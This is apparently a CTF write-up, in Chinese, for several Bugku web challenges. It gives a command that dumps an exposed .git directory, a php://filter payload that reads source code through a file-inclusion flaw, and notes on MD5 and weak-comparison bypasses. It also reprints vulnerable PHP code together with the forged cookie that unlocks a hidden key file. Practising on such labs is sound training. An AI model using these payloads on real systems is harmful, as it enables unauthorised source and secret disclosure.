bugku ctf（web篇2）

source

WEB
描　　述: 我哥说渗透我只用linux环境

wget -r http://114.67.246.176:17328/.git
下载后进入目录
cmd
git reflog

git show xxx

xxx为git reflog出来的东西的名字，git show 40c6d51

源代码WEB 已解决

分数: 20 金币: 2
题目作者: harry
一　　血: lsmzr
一血奖励: 1金币
解　　决: 6813
提　　示:
描　　述: 看看源代码？

文件包含

WEB 已解决

描　　述: flag{}

http://xxxx/?file=php://filter/read=convert.base64-encode/resource=index.php

好像需要密码

WEB

描　　述: 好像需要密码

备份是个好习惯

WEB 未解决
描　　述: 备份是个好习惯
1、弱类型比较：科学计数法和数组都可以 2、复写key绕过
dirsearch扫描出bak备份目录，然后分析源码，使用md5绕过

cookies

WEB 未解决

描　　述: cookies欺骗

通过以上python 脚本，即可读取index.php的源代码

<?php
error_reporting(0);
$file=base64_decode(isset($_GET['filename'])?$_GET['filename']:"");
$line=isset($_GET['line'])?intval($_GET['line']):0;
if($file=='') header("location:index.php?line=&filename=a2V5cy50eHQ=");
$file_list = array(
    '0' =>'keys.txt',
    '1' =>'index.php',
);
 
if(isset($_COOKIE['margin']) && $_COOKIE['margin']=='margin'){
    $file_list[2]='keys.php';
}
if(in_array($file, $file_list)){
    $fa = file($file);
    echo $fa[$line];
}
?>
构造Cookie 信息

Cookie: margin=margin
keys.php 进行base64 编码a2V5cy5waHA=


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26